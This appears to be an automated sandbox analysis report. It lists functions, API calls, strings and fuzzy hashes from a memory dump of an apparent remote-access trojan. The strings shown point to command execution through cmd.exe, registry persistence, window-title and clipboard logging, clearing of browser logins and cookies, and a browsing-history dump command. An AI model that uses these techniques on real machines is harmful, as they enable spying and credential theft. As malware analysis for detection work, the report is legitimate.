ios_base::badbit set, xrefs: 0040D21A
ios_base::eofbit set, xrefs: 0040D24D

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F

Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B

Strings

cmd.exe, xrefs: 00414870
/C , xrefs: 00414859
open, xrefs: 00414875

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
Opcode Fuzzy Hash: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A

Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
RegCloseKey.ADVAPI32(00000000), ref: 00412054

Strings

http\shell\open\command, xrefs: 00412026

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
Opcode Fuzzy Hash: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5

Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249

Strings

pth_unenc, xrefs: 00412204

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
Opcode Fuzzy Hash: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18

Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E

Strings

bad locale name, xrefs: 0040CA28

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699

Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

Strings

P0F, xrefs: 0041226C, 0041228E, 0041226F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: P0F
API String ID: 1818849710-3540264436
Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8

Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
GetProcAddress.KERNEL32(00000000), ref: 00401403

Strings

User32.dll, xrefs: 004013F7
GetCursorInfo, xrefs: 004013F2

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E

Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
GetProcAddress.KERNEL32(00000000), ref: 004014A8

Strings

GetLastInputInfo, xrefs: 00401497
User32.dll, xrefs: 0040149C

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E

Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448C9E
__alldvrm.LIBCMT ref: 00448E9F
__alldvrm.LIBCMT ref: 00448EC1

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
Opcode Fuzzy Hash: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759

Function 00453DF4 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00453F23

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A

Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788

Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
Opcode Fuzzy Hash: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666

Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040AF62
Sleep.KERNEL32(00001388), ref: 0040AFEA

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B025
Cleared browsers logins and cookies., xrefs: 0040B036

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
Opcode Fuzzy Hash: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F

Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

Sleep.KERNEL32(00000BB8), ref: 004111DF

Strings

!G, xrefs: 00411155
H"G, xrefs: 00411163
exepath, xrefs: 00411168, 004111A8, 00411229

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: H"G$exepath$!G
API String ID: 4119054056-2148977334
Opcode ID: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
Opcode Fuzzy Hash: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD

Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E

Sleep.KERNEL32(000001F4), ref: 0040955A
Sleep.KERNEL32(00000064), ref: 004095F5

Strings

[ , xrefs: 00409576
], xrefs: 00409562

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
Opcode Fuzzy Hash: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F

Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568

Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168

Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
CloseHandle.KERNEL32(00000000), ref: 0041A26F

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
Opcode Fuzzy Hash: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536

Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB

Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F

Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004401ED

Strings

pow, xrefs: 004401C5, 004401E2

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F

Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Sleep.KERNEL32(000000FA,00462E24), ref: 00404118

Strings

/sort "Visit Time" /stext ", xrefs: 00404092

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: d6066f6fedcf8ee7e641328f055e00c8f98f2a4b7a6ad40c7887a3f4e34f155a
Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
Opcode Fuzzy Hash: d6066f6fedcf8ee7e641328f055e00c8f98f2a4b7a6ad40c7887a3f4e34f155a
Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99

Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

__Init_thread_footer.LIBCMT ref: 0040A6E3

Strings

[Text copied to clipboard], xrefs: 0040A732
[End of clipboard], xrefs: 0040A725

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
Opcode Fuzzy Hash: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D

Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2

Strings

ACP, xrefs: 0044ED35
OCP, xrefs: 0044ED6B

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C

Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
IsWindowVisible.USER32(?), ref: 00415B37

Strings

(%G, xrefs: 00415BDC

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: Window$TextVisible
String ID: (%G
API String ID: 1670992164-3377777310
Opcode ID: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
Opcode Fuzzy Hash: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A

Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF

Memory Dump Source

Source File: 0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: Connection KeepAlive | Enabled | Timeout:
